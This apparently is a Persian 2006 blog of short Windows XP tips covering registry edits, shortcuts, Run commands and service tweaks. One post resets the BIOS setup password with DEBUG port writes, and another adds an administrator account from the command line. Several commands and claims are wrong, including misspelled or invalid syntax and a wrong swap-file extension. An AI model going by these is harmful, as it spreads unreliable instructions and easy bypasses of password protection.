کامپيوتر خود را راحت تر از آنچه متداول است در حالت Lock قرار دهيد.  با طي کردن مراحل زير شما ميتوانيد يک Icon به صفحه نمايش يا Quick Launch اضافه کنيد که با يک ضربه ماوس بر روي آن سيستم شما در حالت Lock قرار ميگيرد.

1- بر روي صفحه نمايش خود Right-Click کنيد و از Shortcut، New را انتخاب کنيد

2- در پنجرهاي که ظاهر شده در قسمت Type the location of the item فرمان زير را بنويسيد:

rundll32.exe user32.dll,LockWorkStation


3- Next را بزنيد و نام Shortcut را وارد کنيد و کليد Finish را بزنيد.
جهت راحتي بيشتر پيشنهاد ميشود که ميانبر(Shortcut) ايجاد شده را  با ماوس به يک قسمت از فضاي خالي Quick Launch بکشيد تا از اين پس در هنگام نياز با زدن يک کليد دستگاه شما در حالت Lock قرار گيرد.

+ نوشته شده در  سه شنبه پانزدهم فروردین ۱۳۸۵ساعت 6:19  توسط مهدی اردیانی  | 

به کليد زير برويد :


HKEY_CLASSES_ROOT\*\Shell

کليدي با عنوان OPENAS  در آن جا ايجاد کنيد  ( New > Key  )

در openas کليد ديگري با عنوان  command  ايجاد کنيد روي داده  Default  دوبار کليک کرده و مقدار زير را براي آن وارد کنيد  :

Rundll332.exe shell32.dll,Openas_Rundll%1

+ نوشته شده در  سه شنبه پانزدهم فروردین ۱۳۸۵ساعت 6:17  توسط مهدی اردیانی  | 

اگر از طرفداران استفاده از Windows Media Player هستيد حتما با اين مشكل در اين برنامه برخورد كرده ايد كه Media Player بطور پيش فرض فايل هاي ويديويي DAT را در ليست فايل ها نمايش نمي دهد و بايد براي نمايش و باز كردن آنها از قسمت Files Of Type گزينه All Files (*.* ) را انتخاب كنيم تا همه فايل ها بدون توجه به پسوندي كه دارند نمايش داده شوند.

جهت افزودن اين قابليت به Media Player مراحل زير را انجام دهيد :

1- Regedit را اجرا كنيد .
2- باز شدن برنامه كليد زير را بيابيد :
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\MediaPlayer\Player\Extensions

3- برروي Types كليك كنيد . در پنل سمت راست روي عدد 3 دوبار كليك كنيد تا پنجره Edit string باز شود .
در انتهاي قسمت Value Data ابتدا يك ” Semicolon “ و سپس عبارت *.dat را وارد كنيد.
4- Registry Editor را ببنديد و Media Player را امتحان كنيد.

+ نوشته شده در  شنبه دوازدهم فروردین ۱۳۸۵ساعت 7:40  توسط مهدی اردیانی  | 

ALT+double click روي هر برنامه اجرا شود بلافاصله پروپرتيز آن را اجرا مي کند.
F1 آغاز راهنماي ويندوز
F10 گزينه هاي موجود در منوبار را فعال مي سازد.
SHIFT+F10 روي هر برنامه اجرا شود مانند کليک راست عمل نموده و منوي مربوط به رايت کليک را اجرا مي کند.
CTRL+ESC استارت منو را باز مي کند . با استفاده از کليدهاي جهت برنامه مورد نظرتان را انتخاب کنيد.
ALT+down arrow با استفاده از کليد ALT و فلش پايين در کمليدهاي جهت منوهاي drop-down را باز کنيد.
ALT+TAB وقتي چندين پنجره يا صفحه باز داريد با فشرده نگه داشتن کليد ALT و زدن کليد TAB صفحه مورد نظرتان را انتخاب و اجرا کنيد.
SHIFT وقتي يک سي دي در کامپيوتر مي گذاريد و مايليد اجراي اتوماتيک آن عمل نکند ، هنگام قرار دادن سي دي در کامپيوتر کليد شيفت را فشرده نگه داريد.
ALT+SPACE منوي اصلي يک پنجره را که با رايت کليک روي بالاترين بار هر پنجره باز مي شود را اجرا مي کند. از اين منو براي تغير اندازه و جابجايي و ...صفحات استفاده مي کنند.
ALT+F4 پنجره جاري را مي بندد.
+ نوشته شده در  شنبه دوازدهم فروردین ۱۳۸۵ساعت 7:40  توسط مهدی اردیانی  | 


گاهي اوقات بدليل از دست دادن كلمه عبور SETUP دسترسي به پارامترهاي آن بطور طبيعي غير ممكن است.
براي اين منظور مي توان از روشهاي سخت افزاري مانند ست كردن جمپر CLEAR BIOS مادربورد يا از روشهاي نرم افزاري كه با استفاده از برنامه هايي BIOS را CLEAR مي كنند، استفاده نمود.

اما روشي كه در زير آمده است، بدون نياز به برنامه كمكي مي باشد:
-ابتدا به پرومپت DOS برويد.

C:>
مراحل زير را دنبال كنيد:
C:> DEBUG
-O 70 2E
-O 71 0
-Q

با اينكار محتويات SETUP از جمله كلمه عبور آن ري ست مي گردد.
بعد از اينكه اينكار را انجام داديد دوباره به ست آپ بريد و به حالت پيش فرض ببريد.

+ نوشته شده در  شنبه دوازدهم فروردین ۱۳۸۵ساعت 7:39  توسط مهدی اردیانی  | 

اگر شما نميدانيد ويندوز xp شما home است يا professional يا از کدام service pack استفاده ميکند
در قسمت RUN تايپ کنيد:
winver
+ نوشته شده در  سه شنبه هشتم فروردین ۱۳۸۵ساعت 11:29  توسط مهدی اردیانی  | 


 در Windows Explorer، راه‌هاي متعددي براي مشاهده فايل‌ها وجود دارد - حالت‌هاي Icons، Tiles، Thumbnails، Lists و يا Details -. براي انتخاب Details به عنوان حالت پيش‌فرض از منوي View استفاده كنيد. در ويندوز  XP  از منوي Tools به‌ترتيب گزينه‌هاي Folder Options > View >Apply to All Folders را انتخاب‌كنيد. اگر نظرتان تغيير كرد و خواستيد ويندوز را به حالت پيش‌فرض برگردانيد، روي Reset All Folders كليك كنيد.

اگر مي‌خواهيد بعضي از پوشه‌ها در حالت Details و برخي به صورت Thumbnails باشند، ابتدا باتوجه به دستورالعمل بالا حالتي را كه بيشتر از آن استفاده مي‌كنيد به‌عنوان حالت پيش‌فرض قرار دهيد. مطمئن شويد كه در پائين اين كادر و در فهرست Advanced Settings، گزينه‌ي Remember each Folder View Settings تيك شده باشد و سپس OK كنيد. از اين ‌به‌بعد، هرگاه View Settings را براي يك پوشه‌ي خاص تغيير دهيد، سيستم حالت جديد را براي پوشه‌ي مذكور به عنوان پيش‌فرض قرار مي‌دهد.


 

+ نوشته شده در  سه شنبه هشتم فروردین ۱۳۸۵ساعت 11:28  توسط مهدی اردیانی  | 


اين نکته بسيار کارآمد و قا بل توجه است همان طور که مي دانيد در windows در فا يلي به توسعه .swf حا فظه مجازيتشکيل مي شود و قبل از مرا جعه به RAM ابتدا اين فايل مورد استفاده قرار ميگيرد(در run تايپ کنيد system.ini و سپس OK کنيد تا پنجره system.ini باز شود .)اين مسا له باعث کم شدن سرعت کار سيستم مي شود زيرا حافظه RAMاز سرعت به مراتب بالاتري نسبت به يک فايل(سرعت هارد ديسک) بر خوردار است براي رفع اين مساله :
1-در فايل system.ini به قسمت [386 Enh] برويد

2-دستور زير را بعد از قسمت بالا وارد کنيد 1= ConservativeSwapFileUsage

3-کامپيوتر را ]Reset کنيد

+ نوشته شده در  سه شنبه هشتم فروردین ۱۳۸۵ساعت 11:27  توسط مهدی اردیانی  | 


براي اعمال تغييرات دررجيستري نياز به راه اندازي مجدد سيستم مي باشد. با استفاده ازاين ويژگي ،نياز به اين کارنداشته وباانجام Refresh تغييرات دررجيستري اعمال مي شود.

تغييرات مورد نظر خودرادررجيستري اعمال کنيد. سپس ازرجيستري خارج شده گزينه ي Tsak manager را انتخاب کنيد ، سپس زبانه ي Process راانتخاب کرده وبدنبال فايل explorer.exe بگرديد. بعد از انتخاب گزينه End Process از منوي File اين پنجره ، گزينه ي New Task را انتخاب کنيد ودرکادر نمايان شده عبارت explorer را وارد کنيد .

+ نوشته شده در  سه شنبه هشتم فروردین ۱۳۸۵ساعت 11:25  توسط مهدی اردیانی  | 

براي اينکار فايلهايي را که مي خواهيد تغيير نام دهيد انتخاب کرده بر روي يکي از آنها راست کليک کنيد سپس
گزينه rename را انتخاب کنيد نام مورد نظرتان را تايپ کنيد وسپس کليد enter را فشار داده ، يا در يک فضاي خالي کليک کنيد ويندوز به صورت اتوماتيک نامهاي انتخابي را به نامي که تايپ کرده ايد تغيير مي دهد وکنار هرکدام داخل پرانتز شماره اي را قرار مي دهد .
+ نوشته شده در  سه شنبه هشتم فروردین ۱۳۸۵ساعت 11:24  توسط مهدی اردیانی  | 

1 ـ در ويندوز XP فايل­هاي  ntdetect و ntldr كه در فهرست ريشه درايو Boot سيستم قرار دارند را  پيدا كنيد.  درايو Boot درايوي است كه كامپيوتر شما با آن بالا مي آيد.
اين فايل­ها معمولاً مخفي و سيستمي هستند. براي نمايش اين فايل ها دستور زير را انجام دهيد:
Tools -- > Folder Options.. -- > View
سپس گزينه Show Hidden Files را انتخاب و سپس تيك گزينهHide Protected operating system file   را برداريد.
2 ـ اين دو فايل را در يك فلاپي خالي يا در هر جايي كه بتوان بعد از نصب ويندوز2000 به آن دسترسي پيدا كرد، كپي كنيد.
1 ـ نصب ويندوز2000 را آغاز كنيد.
2 ـ حتما براي نصب ويندوز 2000 از پارتيشني به غير از پارتيشن ويندوز XP ، استفاده كنيد.
بازسازي Boot loader ويندوز winresourceXP
وقتي كه نصب ويندوز 2000 به پايان رسيد، كامپيوتر با ويندوز 2000 بوت مي شود.
1 ـ فلاپي را كه قبلاً آماده كرده بوديد در درايو قرار دهيد. ( يا اينكه از پوشه پشتيبان كه قبلاً ساخته­ايد استفاده كنيد )
2 ـ فايل­هاي ntldr و ntdetect را در ريشه درايو Boot كپي كنيد. winresource
حال شما مي­توانيد كامپيوترتان را reset كرده و با ويندوز 2000 يا XP بالا بياييد.
انجام اين مراحل ضروري است. چرا كه نسخه XP فايل­هاي ntdetect و ntldr ميتواند ويندوز 2000 را راه اندازي كند ولي بر عكس آن امكان پذير نيست.

+ نوشته شده در  سه شنبه هشتم فروردین ۱۳۸۵ساعت 11:18  توسط مهدی اردیانی  | 

 روي My Computer کليک‌راست کرده و Propertiese را انتخاب کنيد يا به Control Panel رفته و روي System کليک کنيد. سپس در ويندوز XP روي Hardware کليک کنيد. به Device Manager برويد. در اينجا مشخصات سخت‌افزاري دستگاه شما، به همراه مدل هر قطعه، نشان داده مي‌شود. با دوبار کليک بر روي هر گزينه مشخصات جزئي‌تر آن و در بعضي مدل‌ها گزينه‌اي براي عيب‌يابي ظاهر مي‌شود.
براي ديدن اطلاعات دقيق‌تر و کامل‌تر از سخت‌افزار سيستم‌تان، به منوي Start رفته و روي Run کليک کنيد. حال عبارت dxdiag را وارد کرده و اينتر را بزنيد. در اينجا اطلاعات کامل‌تر و همچنين گزينه‌اي براي تشخيص مشکلات مربوط به Directx وجود دارد. در گزينه Sound ، System و Display adapter اطلاعات مفيدي در مورد CPU، حافظه، کارت صدا و کارت گرافيک وجود دارد

+ نوشته شده در  پنجشنبه سوم فروردین ۱۳۸۵ساعت 9:8  توسط مهدی اردیانی  | 


با تايپ در خط فرمان Run مي توانيد يك يوزر جديد در كمتر از 5 ثانيه ايجاد كنيد و ديگر نيازي به رفتن به كنترل پنل و ... نيست.

دستور زير را در كادر Run تايپ كنيد
اين دستور كاربر را ايجاد مي كند

Net User Hassan 1234 /add
به همين سادگي . نام كاربري كه من مثال زدم Hassan و پسوردش 1234 هستش.

حالا اگه مي خواييد گروهش رو هم مشخص كنيد دستور زير را تايپ كنيد.

Net User Localgroup Administartor Hassan /add
با اين دستور كاربررا به گروه كابران Admin اضافه ميکند.

دنباله دستور بالا مي تونيد دامنه هم در شبكه تعريف كنيدد
Net user Hassan 1234 /add /sad1839
 با اين دستور يوز Hassan رو در دامنه sad1839 تعريف كردم

و با اين دستور مي تونيد يوزر رو پاك كنيد

Net User Hassan 1234 /delete /sad1839

+ نوشته شده در  چهارشنبه دوم فروردین ۱۳۸۵ساعت 7:41  توسط مهدی اردیانی  | 


بايد چند ثانيه تا چند دقيقه صبر كنيد تا كامپيوتر آماده كار شود . البته ، اين مسئله نمي تواند براي اجراي ويندوز چندان مهم باشد . ولي اگر بخواهيد مي توانيد سرعت اجراي كامپيوتر خود را بالا ببريد . برخي از اين روش ها سبب مي شود تا ويندوز نيز به صورت كارآمدتري اجرا شود .

1 : سخت افزار كامپيوتر شما پيش از شروع ويندوز از شما مهلت مي خواهد . شما مي توانيد با تغيير برخي از تنظيمات برنامه Setup كامپيوتر اين مدت را كاهش دهيد . وارد برنامه شويد . هنگام Startup سيستم ، كليد Delete را بزنيد .

 به دنبال يك پيام بر روي صفحه مانيتور باشيد ، يا كامپيوتر خود يا راهنماي مادربورد آن را بررسي كنيد . تنظيماتي كه شما به دنبال آن ها هستيد درون زير مجموعه هايي گنجانده شده اند ، و شرايط هر تنظيم متفاوت است . صفحات را به منظور آگاهي از انتخاب ها و فرمان هاي جستجو بخوانيد .

 Quick Power On Self-Test را بر روي Fast يا Enabled قرار دهيد تا از زمان تست هاي Start-up سخت افزاري و حافظه بكاهيد. . نقطه ضعف اين فرآيند : بدين ترتيب ممكن است مشكلات موجود در RAM يا مادربورد ناديده گرفته شود .

اگر فلاپي شما درست كار مي كند ، نيازي به تست آن در هر بار بوت سيستم نخواهد بود . آن را بر روي Disabled قرار دهيد . كانال هاي IDE ( Primary & Secondary ) خويش را بيابيد . زماني كه اين انتخاب ها بر روي Auto تنظيم شود ، كامپيوتر شما در هر بار بوت كردن و براي شناسايي هر IDE وقفه خواهد داشت . بنابراين بهتر است براي هر كانال IDE بدون استفاده تنظيم None را انتخاب كنيد .

2 : بررسي ويروس ها ، افزارهاي جاسوسي و تبليغات . گاهي اوقات در پنهان بودن برنامه هاي مخرب ، فرآيند Start-Up يا شروع بكار سيستم را كند مي سازد . با اسكن ويروس ها اين برنامه ها را مسدود كنيد . اگر فاقد يوتيليتي هاي ضد ويروسي هستيد ، در خطر زندگي مي كنيد .

3 :حذف برنامه هاي Start-Up غير ضروري . در ويندوز 98 ، Me و XP ، شما مي توانيد برنامه هايي را كه در استارت آپ Loud مي شوند ، ببينيد .براي اين كار Run را از منوي Start اجرا كنيد و در فيلد آن msconfig را تايپ كنيد و Ok را بزنيد .
علامت هاي تيك موجود در سمت چپ پنجره Msconfig را برداريد تا از بر شدن آن ها جلوگيري كنيد . نام و مكان هر فايل به شما كمك مي كند تا آن را بشناسيد .

 توجه كنيد كه در ويندوز XP ، Msconfig داراي يك Services tab است كه ديگر برنامه ها و مولفه هاي سيستم عامل را نشان مي دهد . مي توان علامت برخي را برداشت تا از بازشدن آن ها در Start-Up جلوگيزي كرد . بعضي براي ويندوز ضروري هستند . بنابراين مراقب باشيد همه را از حالت انتخاب خارج نكنيد .

4 : تنظيم رجيستري . برنامه هايي مانند Registry Clean مي تواند سخت افزارها و نرم افزارهاي منسوج را جارو كند . هم چنين Regclean براي نسخه هاي قديمي ويندوز مناسب است . براي XP برنامه هاي تجاري مانند Norton System Works شركت Symantec اين كار را انجام مي دهند .

5: يكپارچه سازي هارد ديسك . هارد ديسك هميشه يك فايل را در يك جا ضبط نمي كند و هر جا كه فضاي خالي بيابد ، بخش هاي مختلف فايل را ذخيره مي كند . يكپارچه سازي هر يك از درايوها سبب مي شود تا فايل ها منسجم گردد و عملكرد شروع كار ويندوز بهبود يابد .

+ نوشته شده در  چهارشنبه دوم فروردین ۱۳۸۵ساعت 7:40  توسط مهدی اردیانی  | 


کافي است به گوگل برويد و آدرس وب‌سايتي را که مي‌خواهيد با گذاشتن يک cache: وارد کنيد. مثلا بنويسيد:
cache:www.hame.mihanblog.com

اگر ميله‌ابزاريا Toolbar گوگل را داريد کارتان راحت تر است. چون براي ديدن نسخه‌هاي ذخيره شده‌ي وب‌سايت‌ها دگمه‌ي مخصوص دارد.

به نظرم اين روش ساده‌ترين است، ولي اشکالش آنجا است که هميشه نسخه‌ي چند روز قبل يک وب‌سايت را نشان مي‌دهد که ممکن است با نسخه‌ي کنوني‌اش تفاوت داشته باشد.
در ضمن در کادري که زير لوگوي وبلاگم گذاشتم خيلي از سايتها رو ميتونيد وارد شيد

+ نوشته شده در  چهارشنبه دوم فروردین ۱۳۸۵ساعت 7:39  توسط مهدی اردیانی  | 

اگر ( Password )هاي سايتهاي مختلف  مانند ياهو و سرويسهاي ايميل و وبلاگها را فراموش مي کنيد آنها را به مرورگر اينترنت (IE) خود بسپاريد  تا تمام آنها را براي شما ذخيره کند.
به اين ترتيب نيازي به حفظ کردن آنها نداريد و از شر پنجره مزاحمي که هربار هنگام وارد کردن کلمه عبور ظاهر ميشود و به شما پيشنهاد مي کند که آن را به خاطر بسپاريد خلاص ميشويد. براي ذخيره کردن کلمه هاي عبور در مرورگر اينترنت 5 يا 6 به منوي Tools وسپس Internet Options برويد. سپس روي زبانه Content کليک کنيد و بر روي گزينه Auto Complete کليک کنيد. سپس علامت کنار گزينه Prompt me to save Passwords را برداريد تا خيالتان براي هميشه از بابت کلمه هاي عبور راحت شود.

+ نوشته شده در  چهارشنبه دوم فروردین ۱۳۸۵ساعت 7:35  توسط مهدی اردیانی  | 

شايد تا بحال با نرم افزارهاي ديگري اين كار را انجام مي داديد ولي در حقيقت با خود مديا پلير ويندوز نيز مي توان عكس گرفت.
براي اين كار كافيست در حين پخش فيلم كليدهاي Ctrl +I را بزنيد.
پنجره ذخيره تصوير باز مي شود.حالا مي توانيد تصوير گرفته شده را ذخيره كنيد.
+ نوشته شده در  دوشنبه بیست و نهم اسفند ۱۳۸۴ساعت 6:3  توسط مهدی اردیانی  | 


وارد رجيستري شويد ( گزينه Regedit در منوي Run ) و به دنبال آدرس زير بگرديد:

HKEY_CURRENT_USER\Control Panel\Sound

در صورت نبود با کليک راست و انتخاب New و بعد String Value را انتخاب کنيد و پوشه جديد را Beep بناميد ( حرف B بزرگ تايپ شود ) و با دابل کليک در قسمت Value data کلمه No را وارد کنيد سپس سيستم را Restart کنيد. 

+ نوشته شده در  دوشنبه بیست و نهم اسفند ۱۳۸۴ساعت 6:0  توسط مهدی اردیانی  | 


اين كار توسط برنامه Group Policy امكان پذير است . براي اجراي اين برنامه گزينه Run از منوي Start را انتخاب كنيد . حال در آن Gpedit.msc را تايپ كرده و Ok كنيد . در پنجره ظاهر شده مسير زير را دنبال كنيد :

user configuration \ administrative templates \ system

حال در سمت راست روي گزينه prevent access to registry editing tools دابل كليك كنيد و در پنجره اي كه باز مي شود گزينه Enable را فعال كرده و Ok كنيد . ديگر نيازي به Gpedit.msc نيست آنرا ببنديد . حال در Run برنامه RegEdit را اجرا كنيد . با پيغامي مبني بر بسته بودن رجيستري مواجه ميشويد. براي آنكه بتوانيد رجيستري را اجرا كنيد مسير گفته شده را دنبال كرده و اين بار به جاي Enable گزينه NotConfigured را برگزينيد .

+ نوشته شده در  دوشنبه بیست و نهم اسفند ۱۳۸۴ساعت 5:58  توسط مهدی اردیانی  | 


با اين روش ميتوانيد عبارت ورودي اتاق خود را درياهو به صورت رنگي بنويسيد :
از داخل ياهو مسنجر خود روي Chat و از آنجا به Create New Room حال در داخل كادر Room Nema اسم اتاق بنويسيد و حال داخل Welcome Massage اين فرمول را تايپ كنيد:

font size="32">[ b][ i]< red>welcome room>

شما ميتوانيد رنگ ها رو به سليقه خودتان تغيير بدهيد و همين طور عبارت Welcome Room

پس از اتمام كار كه فرمول را تايپ كرديد روي Create Room كليك كنيد حال روم شما با سر تيتر رنگي آماده است

+ نوشته شده در  دوشنبه بیست و نهم اسفند ۱۳۸۴ساعت 5:57  توسط مهدی اردیانی  | 

Regedit
با تايپ اين کلمه در قسمت اجراي يک برنامه از منوي استارت .رجيتري ويندوز باز ميشود وبا استفاده از ان متوانيد قسمت هاي مختلف ويندوز را بنا به سليقه و خواست خود تغيير دهيد .متذکر مي شويم در رجيستري چيزي را که نمدانيد حذف يا تغيير ندهيد

Cmd
با تايپ اين دستور در قسمت اجراي منوي استارت محيط سيستم عامل داس روبروي شما ظاهر مي شود و مي توانيد فرمان هاي خود را براي اين سيتم عامل تايپ نماييد

Perfmon
با تايپ اين دستور در قسمت اجراي منوي استارت برنامه سيتم مانيتور اجرا مي شود و در آن جزيياتي در مورد فضاي اشغال شده  از رم و يا مقدار بازدهي سي پي يو و همچنين مقدار اطلاعات خواننده شده از هارد را براي شما  به صورت نمودار بيان مي نمايد

ُSysedit
با تايپ اين دستور در قسمت اجراي منوي استارت ويرايشگر فايل هاي سيتمي اجرا مي شود و مي توانيد آنها را ويرايش نماييد .متذکر ميشويم در صورت تغييرات اشتباه ممکن است سيستم شما بالا نيايد

FireWall
با تايپ اين دستور در قسمت اجراي منوي استارت مي توانيد ديواره آتش ويندوز خود را فعال ويا غير فعال کنيد . فعال بودن ديواره آتش براي امنيت در شبکه ونيز جلوگيري از ورود هکرها به سيتم شما بسيار موثر است.

drwtsn32
با تايپ اين دستور در قسمت اجراي منوي استارت برنامه دکتر واتسون اجرا مي شود اين برنامه در گزارش و همچنين عيب يابي مشکلات نرم افزاري بسيار مفيد مي باشد

ntbackup
با تايپ اين دستور در قسمت اجراي منوي استارت برنامه گرفتن نسخه پشتيبان بر روي سيستم شما اجرا شده و مي توانيد از سيستم خود نسخه پشتيبان تهيه نماييد

diskmgmt
با تايپ اين دستور در قسمت اجراي منوي استارت برنامه مديريت ديسک شما اجرا شده و مي توانيد با استفاده از آن ديسک سخت خود را مديريت نماييد ويا هر يک از پارتيشن ها را حذف نماييد

devmgmt
با تايپ اين دستور در قسمت اجراي منوي استارت ميتوانيد سخت افزار هاي نصب شده بر روي سيتم خود را بازبيني نماييد و يا يک از آنها را حذف و يا نصب نماييد

educedit
با تايپ اين دستور در قسمت اجراي منوي استارت مي توانيد يک کاراکتر بسازيد و يا يک کاراکتر را ويرايش نما ييد

ُServices
با تايپ اين دستور در قسمت اجراي منوي استارت مي توانيد يکي از سرويس هاي ويندوز را لغو نماييد يا يک سرويس جديد به آن اضافه نماييد

msconfig
با تايپ اين دستور در قسمت اجراي منوي استارت ميتوانيد نرم افزارهاي را که در هنگام بالا آمدن سيتم بر روي قسمت سيتم تراي ويندوز قرار مي گيرند غير فعال کنيد .ضمنا اگر سيتم شما دير شات دان مي شود به اين قسمت سري بزنيد

 

+ نوشته شده در  یکشنبه بیست و هشتم اسفند ۱۳۸۴ساعت 7:37  توسط مهدی اردیانی  | 

* در ويندوزXP برنامه Character Map يا Charmap امکان ديدن مجموعه کاراکترها (character sets) داس، ويندور و يونيکد هر فونت دلخواه مثلا Tahoma را فراهم ميکند.براي اجرا کافي است که بدين طريق عمل کنيد :Start->Run->Charmap
پس از اينکه پنجره Character Map باز شد از منوي پايين آمدني Font فونتي را که ميخواهيم انتخاب ميکنيم.
+ نوشته شده در  یکشنبه بیست و هشتم اسفند ۱۳۸۴ساعت 7:34  توسط مهدی اردیانی  | 

کشيدن يک ايتم +ctrl-------کپي ايتم انتخاب شده
کشيدن يک ايتم + ctrl + shift------ايجاد ميانبر براي ايتم انتخاب شده
F2------تغيير نام
Ctrl + right arrow----- برگشت به ابتداي کلمه
Ctr + left arrow------رفتن به ابتداي کلمه بعدي
Ctrl + down arrow-----رفتن به ابتداي خط بعدي
Ctrl + up -------رفتن به ابتداي خط حاضر
Ctrl + shift +arrow-------روشن کردن يک بلوک از متن
Shift + arrow-----انتخاب بيش از يک ايتم
Ctrl + A------- انتخاب همه موارد
F3-----جستجو
Alt + enter-------نمايش مشخصات براي ايتم
Alt + f4-------بستن يک ايتم يا خارج شدن از آن
Alt + spacebar------باز کردن ميانبر براي پنجره فعال
Ctrl + f4-بستن پرونده فعال هنگامي که چند پرونده فعال وجود دارد
Alt + tab------حرکت بين پنجره هاي باز
Alt + esc-------گردش بين ايتم ها در پنجره هاي باز
F4---نمايش منوي آدرس بار در my computer و windows explorer
Shift + f10 ------نمايش ميانبر براي ايتم انتخاب شده
Alt + spacebar------نمايش منوي سيستم براي پنجره انتخاب شده
Ctrl + esc -------نمايش استارت منو
F5------بازيابي دوباره منو باز شده

 

+ نوشته شده در  شنبه بیست و هفتم اسفند ۱۳۸۴ساعت 6:6  توسط مهدی اردیانی  | 


در نوار منوي Windows Explorer در قسمت view > Folder Options مي توان خصوصيات پوشه هاي ويندوز را تغيير داد . اين امكان گاهي اوقات براي ما مفيد و ضروري است ؛ اما اگر نخواهيد كسي تنظيمات پوشه هاي شما را به هم بريزد ، در رجيستري ويندوز در كليد :

HKEY _ USERS \ >DEFAULT \ software \ Microsoft \ Windows \ Current Version \ Policies \ Explorer

يك مقدار عددي ( DWORD ) به نام Nofolder Options بسازيد و به آن مقدار يك را بدهيد . بدين ترتيب ديگر راهي براي ورود به كادر محاوره هاي تنظيم پوشه ها وجود نخواهد داشت و حتي ميانبر Start - > settings>-folder Option ... نيز حذف خواهد شد .

+ نوشته شده در  شنبه بیست و هفتم اسفند ۱۳۸۴ساعت 5:30  توسط مهدی اردیانی  | 

ويندوز XP پس از نصب استاندارد، فضايي بيش از1.5 گيگا بايت از هارد را اشغال مي كند. شما با چند تغيير مي توانيد چند صد مگا بايت را به راحتي از ظرفيت درايو آزاد كنيد.
براي اين كار بايد حالت Standby را غير فعال كنيد. اين عملكرد در ويندوز XP ، فايل hiberfil.sys در فهرست اصلي را در پارتيشن سيستم قرار مي دهد. اين موضوع باعث مي شود كه پس از نصب سيستم، حجمي معادل چند صد مگا بايت از ظرفيت هارد اشغال شود. اگر به عملكرد Standby احتياجي نداريد، آن را با دستور زير، غير فعال كنيد:
Start>Settings>Control Panel>Power Options>System Standby
و بعد تيك جلوي “ Standby activate” را برداريد
+ نوشته شده در  شنبه بیست و هفتم اسفند ۱۳۸۴ساعت 5:30  توسط مهدی اردیانی  | 

 اصولا اين نوع فايلها فيلم هستند خيلي راحت بر روي آن کليک راست کنيد و فرمت « dat» را به « mpg» تغيير دهيد ، البته اگر فکر ميکنيد اين فايل text هست بايستي به شکل ديگه اي عمل کنيد ، بايستي روي آن کليک راست کنيد و سپس Open with  را انتخاب کنيد ، ورد يا هر برنامه ديگه اي که با تکست سرکار دارد را انتخاب کنيد .
براي تغيير فرمت از « dat » به « mpg » به مثال زير توجه کنيد.
Dariush.dat
به صورت زير تغيير دهيد
Dariush.mpg
حال اگر روي فايل با فرمات « mpg» کليک کنيد در ميديا پلير باز خواهد شد و شما فيلم مورد نظر را مشاهده خواهيد کرد

 

+ نوشته شده در  شنبه بیست و هفتم اسفند ۱۳۸۴ساعت 5:26  توسط مهدی اردیانی  | 

براي نشان داده شدن تلفن تماس گيرنده در ويندوز ايكس پي يك ابزار مناسب در خود ويندوز هست.فقط كافيه هر بار كه ويندوز بالا مي آد اجرا بشه.براي اين كار
1. برين به start menu و روي فلدر startup يك كليك راست بزنين و روي open كليك كنين
2. يك short cut بسازين و ادرس زير رو بهش بدين:
C:\program files\windows NT\dialer.exe
بجاي C هر درايوي که ويندوزتون  قرار داره بزاريد
3. short cut رو كه ساختين اون رو اجرا كنين. يك پنجره ظاهر ميشه.
4.در پنجره جديد كه اسمشphone dialer هست برين به منوي view و روي Hide when minimized كليك كنين.
5. هر وقت ويندوز بياد بالا اين پنجره روي صفحه ظاهر مي شه كافيه هر بار اونو مينيمايز كنين تا بره توي taskbar .هر كي هم زنگ بزنه شمارش مي اد سمت چپ صفحه.
+ نوشته شده در  شنبه بیست و هفتم اسفند ۱۳۸۴ساعت 5:24  توسط مهدی اردیانی  | 


اگر از كامپيوتر خود به صورت شخصي استفاده مي كنيد و كامپيوتر شما در داخل شبكه اي نمي باشد، مي توانيد با انجام تغييرات ذيل Windows XP خود را سريعتر و مطمئن تر كنيد:
ابتدا دستور زير را انجام دهيد:

Control Panel > Administrative Tools > Services


سپس با خيالي آسوده گزينه هاي ذيل را "disable" نماييد:

Alerter
Clipbook
Computer Browser
Fast User Switching
Human Interface Access Devices
Indexing Service
Messenger
Net Logon
Netmeeting Remote Desktop Sharing
Remote Desktop Help Session Manager
Remote Procedure Call Locator
Remote Registry
Routing & Remote Access Server
SSDP Discovery Service
TCP/IP NetBIOS Helper
Telnet
Universal Plug and Play Device Host
Upload Manager
Windows Time
Wireless Zero Configuration
Workstation


 

+ نوشته شده در  جمعه بیست و ششم اسفند ۱۳۸۴ساعت 12:39  توسط مهدی اردیانی  | 

در ويندوز XP  در RUN تايپ ميکنيد CMD و Enter را ميزنيد  حالا در اين قسمت تايپ کنيد : sfc /scannow و بعد Enter را بزنيد. در اين لحظه از شما درخواست ميشود که CD ويندوز XP را درون درايو قرار دهيد و بعد دکمه Retry را فشار دهيد. بعد برنامه تمام فايلهاي سيستمي شما را چک ميکند و به طور اتوماتيک فايلهاي معيوب را تعويض ميکند.


 

+ نوشته شده در  جمعه بیست و ششم اسفند ۱۳۸۴ساعت 12:38  توسط مهدی اردیانی  | 

1- براي رسيدن به Propertis كافيست Alt را نگه داشته و روي فايل مورد نظرتان دابل كليك كنيد.

2- كليد Alt در هر پنجره اي با يك فشار منوهاي پنجره را فعال مي كند و با تركيب آن با هر كدام از حروف منوها كه زير ان خط كشيده شده ان پنجره را باز مي كند.

3- در مرورگر اينترنت تركيب Alt و End شما را به آخرين صفحه اي كه مشاهده كرده
ايد، خواهد برد.

4- در مرورگر اينترنت IE، تركيب Alt با يكي از دو كليد جهت راست و چپ، عمل Back و Forward را انجام مي دهد.

5- با تركيب Alt و Tab، شما مي توانيد پنجره هاي فعال در ويندوز را جابجا كنيد.


 

+ نوشته شده در  جمعه بیست و ششم اسفند ۱۳۸۴ساعت 12:38  توسط مهدی اردیانی  | 

اين تنظيمات به شما امکان مي دهد تا تنظيمات پيش فرض Startup List را که در30 ثانيه مي باشد را تغيير دهيد . ويژگي فقط خواندني فايل BOOT.INI را غير فعال کنيد . اين فايل در پوشه ويندوز  قرار دارد .  آن را در يک ويرايشگر متني باز کنيد . در قسمت [boot loader] مقدار گزينه '=timeout' را برابر مقادير زيرقرار دهيد : مدت زمان را بين 1 تا 999 ثانيه در نظر بگيريد . براي آنکه ويندوز فورا بوت شود مقدار آن را برابر '0' قرار دهيد براي آنکه سيستم تا زماني که شما تعيين نکرده ايد در همان وضعيت منو باقي بماند مقدار را برابر '1-' قرار دهيد و يکبار ريستات بکنيد.

 

+ نوشته شده در  جمعه بیست و ششم اسفند ۱۳۸۴ساعت 12:36  توسط مهدی اردیانی  | 

